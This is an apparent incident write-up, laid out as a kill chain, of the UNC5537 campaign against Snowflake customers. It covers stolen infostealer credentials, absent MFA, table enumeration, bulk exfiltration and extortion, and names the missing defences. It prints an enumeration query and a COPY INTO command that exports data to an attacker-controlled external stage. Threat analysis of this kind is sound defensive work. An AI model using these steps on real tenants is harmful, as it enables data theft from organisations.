UNC5537 / Snowflake – Infostealer Creds → No MFA → SHOW TABLES → Bulk Exfil → 100+ Orgs Extorted
A financially motivated threat actor tracked as UNC5537 spent months harvesting Snowflake credentials from infostealer malware logs, then systematically logged into victim Snowflake tenants — none of which required MFA — and exfiltrated large datasets. Over 100 organisations were hit including Ticketmaster (560M records), AT&T (73M records), and Santander Bank. Snowflake itself was not breached; the attack was entirely predicated on absent MFA and reused credentials.
UNC5537 sourced valid Snowflake credentials from infostealer malware logs — RedLine, Vidar, and Lumma stealer families had infected contractor and employee devices, exfiltrating saved browser credentials including Snowflake login URLs. The logs were purchased from underground markets or obtained from prior campaigns. Mandiant confirmed some credentials were years old and still valid because passwords had never been rotated.
Credential age: Some logs dated years prior to the campaign — passwords never rotated
Why it worked: No Snowflake-side MFA requirement · No network policy allowlisting · No anomalous-login alerting
Using the harvested credentials, UNC5537 authenticated to each victim's Snowflake instance. Snowflake did not enforce MFA by default at the time — it was available but opt-in. None of the compromised accounts had MFA enabled, and no network policy restricted which IPs could connect to the tenants. The attacker connected using the SnowSQL CLI and the Snowflake JDBC driver to automate credential testing at scale.
MFA status: Not enforced — opt-in at account level, not mandated by Snowflake platform policy
Network policy: No IP allowlist configured on any of the affected tenants
Detection gap: Logins from new IPs/countries generated no alert to account owners
Once authenticated, UNC5537 ran Snowflake's native enumeration commands to identify all databases, schemas, and tables accessible to the compromised user. The commands are native SQL — no exploitation required. Because the accounts were often service accounts or analyst accounts with broad SELECT permissions, the full data landscape of the tenant was visible in seconds.
Also used: SELECT * FROM INFORMATION_SCHEMA.TABLES to enumerate accessible objects
Typical finding: PII tables — customer names, emails, phone numbers, payment card data, SSNs
UNC5537 used standard Snowflake SQL to stage target data into temporary tables, then exported it via COPY INTO to an external stage (attacker-controlled S3 bucket or Azure Blob) or downloaded it directly via GET. Large datasets like Ticketmaster's 560M-row table were extracted over multiple sessions. Snowflake's query history log retained these commands, providing forensic visibility after the fact — but no real-time alerting fired during exfiltration.
Stage 2 — export: COPY INTO @external_stage/dump.csv.gz FROM attacker_export;
Scale (Ticketmaster): 560M records, 1.3TB — sold on BreachForums for $500,000
Detection gap: No DLP on Snowflake COPY INTO · No alert on large external stage writes
After exfiltration, UNC5537 contacted victims directly with samples of stolen data as proof, demanding payment for deletion. When victims did not pay, datasets were listed for sale on BreachForums. The Ticketmaster database was offered for $500,000; AT&T data was listed separately. Mandiant assessed UNC5537 had at least one member residing in North America and coordinated with a partner in Turkey.
BreachForums listing: Ticketmaster — 560M records, $500,000 · AT&T — 73M records
Actor attribution: UNC5537 — financially motivated, some members in North America and Turkey